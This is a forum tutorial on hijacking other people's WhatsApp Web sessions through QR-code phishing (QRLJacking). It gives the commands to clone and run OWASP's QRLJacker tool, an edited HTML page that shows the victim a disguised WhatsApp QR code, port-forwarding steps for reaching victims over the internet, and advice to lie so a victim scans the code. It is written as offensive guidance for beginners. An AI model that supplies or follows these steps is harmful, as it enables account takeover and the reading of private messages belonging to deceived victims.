Forum Thread: Hacking into Whatsapp Series, Part 2: Phishing.

Whatsapp web has been out for a while now

it gives you the ability to use whatsapp on your computer, you simply need to scan a QR code with your phone from whatsapp and you'll gain access

1-QR code?

a QR code(short for quick response code) stores a bunch of code inside it and is widely used because of how fast it can be read by smartphones.

this is a QR code:

How are we supposed to use phishing in this scenario if there's no credentials?

Well, theoretically, if we can come up with something that can extract the qr code from the web.whatsapp.com page open on our browser, and display it on a website we made,then send that link to the victim to scan the QR code on it, the whatsapp session should be open on the original whatsapp web page on our browser.

Now, you must be asking, you expect beginners to code that?
No, I'm well aware you can't
fortunately, the work has already been done, all you have to do is follow the steps.
OWASP created a tool, capable of doing all that

this attack has been out for so long, but to my surprise not many people know about it, so i thought about shedding some light on it.

Okay so how do we use it?

Let's start by opening a new terminal
and type in git clone https://github.com/OWASP/QRLJacking.git

side note:There's two ways to use this, either manually or automatically by using the QrlJacker

For the sake of keeping this tutorial short, and for it to be beginner friendly, I'll demonstrate how to do this with the QrlJacker.

now we need to enter the directory that contains the frame work, to check if we have all of the requirements
to do that we will use CD
type in your terminal cd QRLJacking/QrlJacking-Framework

if you're using kali linux, usually the requirements are already met, but as a matter of caution we'll run the requirements installation script anyway.

to do that type in pip install -r requirements.txt

Now that that is done, we're ready to start
To use the QrlJacker type in the following:
python QRLJacker.py

As you can see, many options are available, but for our tutorial we're only interested in whatsapp
type in 1 and click enter
then type in 1 another time
you'll be asked to choose a port, leave it empty if you would like to use the default port(1337)
A new window of mozilla firefox will be opened and the server will be started at yourIpAdress:portYouChose
for me it's 192.168.1.103:1337

As you can see, The qr code is displayed on this local website that we will send to the victim
but who would scan that? Too suspicious
Let's edit it.
go to QRLJacking/QrlJacking-Framework/
right click on index.html
open with other application, choose a text editor
then edit it to be like this code
<!DOCTYPE html>
<html>
<head>
<title>Whatsapp</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.png?h="+d.getTime();}
</script>
<center>
<img id="qrcodew" alt="Scan me!" src="tmp.png" style="display: block;">
<a href="#">Scan the code with whatsapp</a>
</center>
</body>
<style>

body {
background-color:#000;
}

#qrcodew {
background-color: white;
padding-right: 35%;
margin-top: 10%;
padding-top: 4%;
padding-bottom: 4%;
padding-left: 35%;
}

a {
text-decoration: none;
}

</style>
</html>

Kept that code as simple as possible, that way even beginners have a chance in understanding and editing the code to their liking

this is script kiddie level code

To be able to do this attack easily over wan, go to your router configuration page and forward the port 1337 on your private ip

(in my case it's 192.168.1.103)
then
the link will be yourPublicIpAdress:portYouForwarded
example: 93.176.88.82:1337
send that link to the victim if he's outside of your network
and he'll be able to access our fake website

create a lie to make them scan the code
and you'll be able to access their whatsapp.